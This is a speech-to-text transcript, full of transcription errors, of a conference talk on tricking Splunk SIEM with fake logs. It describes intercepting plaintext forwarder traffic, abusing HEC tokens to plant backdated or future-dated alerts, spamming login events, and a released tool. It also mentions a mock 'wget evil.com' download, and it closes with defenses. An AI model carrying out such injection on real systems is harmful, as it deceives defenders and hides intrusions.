SIEM Slam: Tricking Modern SIEMs With Fake Logs And Confusing Blue Teams - Özgün Kültekin

so I am quite excited to be there and welcome you all to my talk and thanks for besides PR organizes uh kind invitation uh seems like like I don't know European defon and without any bomb alarm so we are so safe I'm so glad to be there and my talk is about CM slam uh basically tricking the modern CM systems with creating and injecting fake logs and confusing the blue teams which is my favorite so who am I and what I do I'm aun I'm 20 23 years old and currently uh living in Turkey I'm an offensive security engineer trendle group uh which is a quite tech high- tech focused uh e-commerce company so I had a chance to

um investigate lots of different applications different mobile applications active directory web to desktop applications um I got bunch of uh certifications swcv and bunch of others uh my main focus is penetration testing but I do um brid attack simulation to like creating great team designing great team campaigns and applying them and my previous talks uh on 20123 was on bide San Antonio tyana and activity so we got uh a pretty dance contents but let's just skip it okay so let's start with some basic rules I mean uh we are all probably working somewhere and we all dealt with some CM tools I guess so do we trust logs do we trust Sam do we trust our

blams we we trust yeah can I see you some hands yeah okay yeah I mean we of course trust right no it's it's not trap so okay first rule is uh never trust your logs and never trust your CM systems which is um soonly we found out we find out that and the second rule is um so we are dealing with Sams as we talked earlier but how many of us specifically using Splunk in their company in personal okay I see bunch of fans okay so you are saying that you are using splank well okay from now one it's better to not talk about that kind of things if anyone ask you about what product of CM

you are using just don't answer okay let's start with some introduction for uh whom doesn't know something about CMS maybe so cm is basically uh security information events management right so it is centralized log management that we can keep all of our logs from desktop from web applications from I don't know kubernetes containers and it actually stores what you give any logs I mean you can actually use splank as your notebook so what you give is will be presented over the splank UI or CM UI and blue teams are using using this Splunk or CM tools to generate alerts based on some rules for example they are saying they are saying something like okay if if

last three minutes if in last three minutes if we get over 10 Windows login fil event then we are under some password spring attack maybe and also they have to use that because of some compliance and regulatory requirements because you know they need that and also we can use it for historical analyzes and forensics from the past okay so I chat with my best friend I asked that hey I need to hack the most popular CM solution in the world what is that and the immediate answer was Splunk as the I asked to gp4 I have little money and it says 2024 based on 2024 U where 2024 data splank is the most recognized SLE then from that moment I

just turned my all Focus in

spank okay so example structure of this plun is so we are seeing bunch of forwarders data sources inter intermediate forwarders indexers and search ads so let's start with forwarders they're basically basically splank agents that we buil on any other any machine that we want to get logs get data from so it's it's not an external component we just go into our windows or Linux machine install the universal forward. x.s and just build it and it actually collects the logs from the some of the local files that you said for example audit. log and forwards the logs from index from Universal forwarder to intermediate forwarders or as you can see from the above directly to indexer second one is have forwarder

have forwarder uh um is like probably our all of our companies have the prohab forwarders because we need some additional um data manipulation before the before data is coming to the indexer have forwarders perform some parsing and indexing at the the source and on the host machine and send only the part events to the indexer so it's you can think it like intermediate extra data manipulation so the the deployment server is actually just uh sending some configurations some extra settings uh some other content updates to both Universal forwarders both have forwarders sometimes indexers but not so common an indexer is uh basically transforms the all upcoming data into some events and stores it in under some

disk and and the search ad is actually the where we running our searches I mean there's also some splank UI we are writing our queries to splank UI but it actually runs that queries into into the search ads and search ads just give some jobs to the indexers so let's start from over forwarders consume the data indexers index and search the data and searchs just coordinate this all communication and Management console is just a set of dashboards platform assets something like spangard do and search it is just a fence part of Splunk that we all use and see the screen it's splank gray okay so chapter one what hacker needs okay so let's consider a

hypothetical scenario where um consider an attacker who has managed to get into a company and has an initial access of some let's say Linux machine and did some privilege escalations and got root privileges or in case of window system privileges what can hacker do after that step he can she can data exfiltrate some steal some s sensitive data and send it over um attacker C2 server or just disrupt some business operations or launch a ransomware attack but in that also some Discovery needed right because you need to discover more um you know sexy Targets in the network to hack with but when doing all of this the problem is AER makes d Nos and we uh we

are leaving so much traces and uh this is the problem I need to get a solution with okay so love is all you need no we need time to exrate some data I think it needs more time to Recon more discover more execute the execute kill chain and exfiltrate data over his her C2 server but we are making so much noise there we are left some traces all over the cam loocks probably and BL seem is already investigating us right because we got initial access we got our route access privilege escalation and we are constantly doing something so blue team is probably already investigating us so in that point what can attacker do okay so the main topic of this talk

is we can create and inject fake logs and by creating these fake logs we can mimic another attack what I mean by mimicking another attack is actually that let's say you compromise the uh host on the left the can I do it not sure all right uh the compromise those and let's say you want to distract the buo teams so what you will do is after discovering that some payment server is going over there you can just show that hey bu team your payment server got hacked do you want to do something or do you still want to chase me they probably go over a after the payment server right so you are you are

having some more time over there and um besides that you can spam some logs and make some noises and it could have some you know um some uh downgrades in case of uh wasted dollars if your splank instance uh charge you uh with the event count so how it all started so I was doing something security device inspection I woke up wash my face get some coffee and like all of all of you doing we investigated EDR CM SWS right so uh in that point we actually What We R teamers actually do is after we got some root privileges on the Linux host or Windows host uh it is pretty much harder on Windows because of the PPS but

in Linux you can just kill the edas right kill Falcon kill other antiviruses or kill CM locks why don't we why why do we uh want to send logs U again so we just killing it but in that point I thought that why kill it we can break it so let's check how common comp components of spun or CM tools communicate and I solve something and I noticed that the traffic between the forwarders and indexer is plain Tex I mean what the heck why can I see my host IP my host name the comment that I just executed on the host I can see those as the pl text so what can I do with that

so it actually determines my research Focus so research Focus was analyzing the modern samples especially splank on the splank for now and with default configurations what can we do let's investigate forwarders and IND index of communications do some men inth middle type of attacks and inject logs and for red teamers we can actually use that log injection as part of the red teamers you know after the PO post exploitation after you get rout access you can do that okay explore and exploit so sending logs is uh quite easy as I said before uh it has like positive aspects for blue teams negative aspects for who knows that attack after that you so let's explore the CM traffic so I

intercepted the forward TCP traffic by creating some kind of Ip tables rules like let me examine all of the packets before it goes outside and I passed it I made it read readable and I started to detect useful headers and I found some executed comments over there host name IP addresses some machine IDs because it also sends the machine ID which is which can be found under the ETC machine ID it's a unique value and after all of that after modifying it I fixed that the TCP pack structure which I mean uh fixing the check sum length because of the TCP headers I modified the TCP bucket and send and what happened is we actually uh made search that looks like

I executed some other component some other command so first one is outgoing s loocks from forwarder uh there's some Quee that I created with IP tables it looks like it's between the forwarder and index but actually it's just inside the forwarder because I'm just set setting a IP labl rule so I just make it to like look easy uh but attacker interest has the packet from que like before going outside get the packet read the data okay check the desired data if desired data there just find and replace it with the malicious common let's say and um make the pcket go again and after modified log goes to the indexer you can see the lovely face of the confused blue

team over there because they going to see that oh this machine got hacked okay injection injection how injection Works um we are not creating a Lo we are just modifying it right so what I show you uh is I'm just modifying logs on the Fly I'm actually not creating logs so how can we create create our desired logs I mean I couldn't find all the logs I can't create create um stretch log so what we do is do the same interception to same IP tables and execute commands in parallel like the like the image states which I created using uh doly I guess and which is pretty uh sexy actually because it's actually um executing comments with his left hand

and injecting with is right then so execute commands in parallel capture your only actions log and modify it as you wish and send it to indexer so with this way we can actually uh like create a new log okay but there's a problem right I mean what I did say is uh execute shell command on your own command on your own host machine and then capture it and change the host IP okay I can do it but do you want me to execute some malicious commands on my compromise aimation that that doesn't make any sense so what we did is generate hashes of the desired commands let's say you wanted to uh run some ransomware just hash the random

ransomware command and generate the execute the hash keep them in a map and when you listen and intercept the traffic when you see that hash just replace it with the original one what did I mean was let's say you want to uh execute Doug evite.com malware attack right so instead of w get you will um execute a 92c which is um probably I used sha 256 um take first part and after that uh the blue image shows that packet font with Target data inside and Target data was a 92c when I so the a92 C on the packet I just immediately replace it with the dou get and with the for the second command I just find that string hash in packets

and replace it with with the elite so I created a um CLI tool with goang which name is lo slipper and in this part I am demonstrating that for the TCP scenario okay loog slipper is actually look like that um and it made with goang it's an inter interactive CLI tool but it also can work with like basic commands and parameters because we we need to be fast but it's just demonstration Tool uh it actually automates the whole process from like executing the commands in parallel and intercept the traffic finding replacing and sending again and it lets you act as Target with Target shell play on which is we'll about to see um in this example

scenario let's say I compromised a machine in the Target environment which host name is O's machine and original host IP was 10141 64 and the the other machine that I want to Target like the one that I want to show bulletins Hey prag Demo got hacked so Targo name is prag demo and IP address 1070 80 95 so it's demo

time okay once we get um help menu you can see a bunch of comments over there like interactive mode but in besides of that there's some bullettin Attack Mode which we'll explain later and I'm going to start this tool in an interactive mode and what am i showing here is um currently on the splank UI you are just seeing the logs from osun's machine because let's say there's there's nothing no another machine on the network for demo purposes you are just receiving a data from uzun's machine because it's the only data

exist as you can see from the host menu there's just one okay so what we're doing here is it works with some uh host file and starts with detecting the target plank instance you don't have to give any index or IP address it can manually it can automatically find that uh by intercepting your traffic again and find who am I sending logs to and find the target indexers IP address and um save it into a host file so it is detecting the target blank IP for like listening the traffic for 10 seconds so after that it found that we are actually sending logs to 10141 63 so we are entering the target IP we want to mimic we want to show that it's

hacked 10780 95 and prog demo is the host name and which will be explained later okay so there's a four different menu uh we are going to select the target shell mode and it actually spawns a Target shell Play Zone okay it firstly what he what it did is uh it sets up the IP tables rule to intercept all upcoming

packets after waiting some seconds uh we are generating n machine ID because we cannot sent with the same machine ID right so I generate new machine ID I'm sending with this so each log send from this computer will be manipulated with Target data from now on and you can also start execute commands right now okay so what you did see here is um it's a Target shell play on you can enter commands to make them look they are executed on the target system so the targets of us is prog demo with the IP address and with the machine ID so let's let say we are executing some malicious

commands and before executing any commands now we can see that there's logs going coming up from the prag demo which which even doesn't exist on my actually splank environment I can made up new make make made up new host names new IPS but we started to see some program host coming up

it SS already already over 50 logs so let's say I want to execute Doug evite.com download some malicious. sh right so uh after immediately um my fake hash log is going at my machine I captured it change the WG change the uh change the a92 C change the other hash with the correct values at the same time I am also changing the original host name with the pr demo original host IP with the fake IP and also I want to do some N Things so I started malare s with encrypt all I mean can you imagine what blue team would react when they see this log in their CM environments which they trust okay so I am um doing some

filterings on splank I'm creating exact W exact V and what we did see here is there's actually looks coming up from PR demo and it executes sudo Doug evite.com which even not exist and you can see that we also Chang the host name host IP and the Machine ID with the desired ones and after that we can even see that they encrypt all the stuff pretty fact right I mean uh in this point um I just don't want to be uh blue teamers anymore which I'm not uh so this is actually what happened in our demo but we uh we have more stuff okay so I said that Universal forwarders actually not like creating logs they are actually reading from some

loog files right we can also manipulate that so what I mean by that is universal forwarder just the basic program so why don't we mess with logs so in the inputs. comom which is Plank's uh basic file that okay we are saying that read logs from this file when a new entry is added to this file just get it and send it to the indexer so we can add some whole new file to there or um we can just manipulate the other files and I actually put some new line like uh pseudo lated event to do audit log and it actually also reflect to the page which is a pretty more basic attack but you cannot change uh anything as like as

you can see we have our host IP as the original one andun machine we also need to capture it on the Fly because we cannot just uh Define host machion or host IP on the command line okay chapter hack uh what is hack or should I say what the heck because you you are not going to like what you see okay in case you need some uh logs of your applications and uh let's say you have some public instances public web apps public mobile applications and you want to get logs from there Splunk made a genius component called hack so uh you don't need any un Universal forwarders anymore to execute on the Target component or Target web app let's say

and it lets you send data events over the HTTP or https hopefully and it's token based Json API it uses token based Json API and one of the spun guys um seems very proud when answering like this unlike authentication tokens H tokens do not expire so congratulations okay example H imple implementation is actually like that uh let's say you put your public heavy event forwarder or indexer uh which is open to public your uh token here and the payload you you want to send for example I sent some gate ID some entering State um let's let's say that it's a Turn Style or just door okay so when we look the overall picture um the right right part is what

we already discussed I mean there's some NYX machines some V machines uh databases uh via the universal forwarders they send logs to heavy forwarders and heavy forwarders to indexers and we can just lock everything on on the machines in the hex scenario we have some public web apps public mobile apps some Pacs server which is a personal attendance check system uh that receives data from let's say card readers or Turn Style controls they are they don't have any universal forwarders they sent to have forwarder uh logs as the HTTP so after you after have forwarder head forwarder just transmits the logs to the indexer as uh using T TCP or IP tcpip protocol uh but in that scenario

you can actually um send logs from those applications to indexer uh without a need for have forwarder which is quite bad okay hacking uh things are getting worse from that moment um what can attacker do with with a hack token okay so I think it doesn't need any doesn't need any listening on traffic doesn't need any actually maybe um common execution on the web app maybe and we can create more simple yet chaotic attack scenarios and execute the attack from any machine and what is worse than the attacker uh a time traveler one and it's a bit spoiler for the upcoming slides okay let's discuss the time Travelers attack using hack attacks like we are

sending just HTTP events um attacker actually can create logs from the past and from the future and attacker can actually plant the bump from future and wait for the explosion let's say from now on I am saying that payment server will run mimic hats in 2031 that's possible and when it days come blue team got alerted uh and I'm not even the environment anymore so even though attackers are not present in the environment they can create alerts okay so the next demo will be about time traveling and in that part um I just use the command line instead of interactive so as the time uh it's the exact time let's say I said 2002 uh a very past time very past time

and uh I'm saying ASD R 1130 and from the domain prog test from the account SQL admin and it's it's for the Windows Event creation I am giving the hack token over there um IP I want to mimic uh process I want to create um I want to create mimics process with parameters token Elevate on 2002 on the host name SQL Server let's say so when I executed that Lo Sy says that I created a log on behalf of SQL Server 01 with IP with process with parameters on the time I mean there there might be a difference on time like 3 hours because the UTC UTC 3 difference so when we go into Splunk and

search for as the date let's say like before 2003 and what we see here is we actually created log from 200

to yeah I mean it doesn't make in sense right I completely agree with you and what funny of creating logs from 2002 is actually I mean founded on 2003 man okay so uh another attack was time bomb attack let's say bullet teamers have the following attack which detects the new process creation 4688 event code you probably heard that a lot new process name contains mimic. ex I know which is not a perfect um alarm because you can actually bypass that with changing mimas to somewhere else uh but let's say our lovely bu teams made that alert and it's checking um every two minutes the past 3 minutes so the current date is April 2 2024 and

R is um 22+ 2 so I created log uh as 2323 which means you should add three on my time zone so it actually corresponds to 23 past 2 which is 1 minutes later from the current time current time is 20 22 plus 2 still and we are we will be generating alerts from 1 minute later so let's wait for 20 seconds

more okay it's now 23 three and this is my alert screen uh it was a previous alert which is from the uh same names earlier just don't mind that what we going to see is a aler is coming

up so I refresh the page and see that a new whole new alert is coming and and um the worst thing about this alerts is I mean blue teams got freaked out so they when they examine the um corresponding block they will see that prog test has um SQL admin user on prog test prog test domain uh with the computer name SQL Ser 01 has created mimic. XA with bunch of parameters

and on on the mail on the like classical mail that um probably when when we executed this attack this is most scary moment for the blue team they will receive some mail like that SQ server mimic has execution detected PR nightmare so so uh we can also do Windows Event spam like I said uh so as you know active directory is one of the most crucial part of the of R Ms right so companies tend to have much more alerts much more hardenings on that uh on that components for example they probably caught you if you tend to do some password spraying or pass the hash attack and this demo uh just does that this time I will open my log

slipper as interactive mode entering um setting a new config with hack token this is how how can I give hack token on loock sler uh by setting a new config so after the hack Attack Mode uh I will choose the bulletin attacks and windows mode and let's say login success EV event spam and it requires some Target domain name which I gave as bdo.com and SQL admin as user some Target subnet uh why we are giving Target subnet because it will create a bunch of login fail or login success events in uh from this subnet I mean if after the Recon reconnaissance part if you know the targeted subnet you can just give this uh Target subnet or give IPS

manually so we are entering the start time of the attack and finish time of the

attack and how many login successful attacks I want to send so it gives you a table that says hey I created those logs and sent to the indexer there are some host names there are some IPS and there are some random randomized times that you selected um so it creates login successful events on those host names and IPS so when we go into splank and um type our search query as index V event um and specify some account domain and then okay you will see that 25 events are actually came to our uh spunk UI so there's all um login failed login success events like that's say an account was successfully logged on in B

demo.com domain um as SQL admin using SVC horse which which will we which we see in past

Tex and this one is um for the logging log fail attempt let me just skip that fast so it also creates a bunch of logs as login fail from those host names and those IDs and when we search for um event ID 4625 I guess uh 24 so it says oh this one account successful L on sorry and this this was the login failed attempt I said pr.com administrator is failed to log on um to those computers for 20 times between those dates so when we search for 4625 event which is login failed event we will see 20 events are actually came and they they are showing that an account failed to log on it's probably a

password spraying attack I mean the scari thing is if if a blue doesn't know about this attack doesn't know that if cm is actually or logs are not should not should not be trusted and can be manipulated they will freaked out when they see that so chapter seven fighting back uh you might say I mean just encrypt it right why don't we encrypt it spung is a beautiful company they already implemented some encryption you can use it you can import TLS certificates public K private k um it's pretty much secure but they disabled it on Enterprise by default I mean what the right so if you just set this up you don't have any encryption probably none of you

actually have because there's a reason about that uh I mean spun also can say okay I'm giving you some certificates no problem but the problem is root certificate is the same in every sulun in installer I mean if you if you decide to use Plank's default certificates and attacker can just get the private K from their own instance and use it on your machine so what are we going to do uh we simply enabled the encryption on the forwarding right uh do not use the default certificates distribute the root certificates and keep our eye on this root certificates make sure that uh they are not just um revocated and they are secure but we need to also pray that the

CPU doesn't burn out this is why none of our company can enable the encryption because it actually a very big burden on your heavy forwarders indexers Universal forwarders if they trying to encrypt your data when pedabytes of data is coming up you cannot simply encrypt it so what we should what should we do um as splank also States there's some SSL um encryption burden and let's talk about some detections um on indexer and have forward logs um at the end of the day we are sending from y machine to X machine right so you can actually check the source IP with the host IP in the lock but you can do it periodically but it's

also a performance issue there is a hidden index time F index Time Field uh which actually gets the time from the indexer so you can actually um detect the time traveling attack with getting the correct time but um most of the blue teams blue teamers just using it for debugging purposes and hardening some ways to detect change your heck tokens periodically if you're have forward publicly just do your portrait directions do not use public indexer um use head forward to configure configure it and um you can Implement your own I mean you shouldn't roll your own crypto but you can do some checks as the road map uh we will add log slipper for Windows hack other popular CM Solutions

too and we want to integrate this as the post exploit model to the let's say Cobble strike uh so let's confuse blue teams together uh I said I published my lock sler just uh yesterday night for you guys uh so you can just test it and hack your own splank instance and you can contribute with new Buon attack types and extra customizations and we can maybe share the live site coming from Cisco you know and thank you so much uh that's my Twitter mail you can reach out LinkedIn and I I want to thanks to uh specifically to my seops team in chel honor Yu and offensive security team asil and SW from splank thank you

guys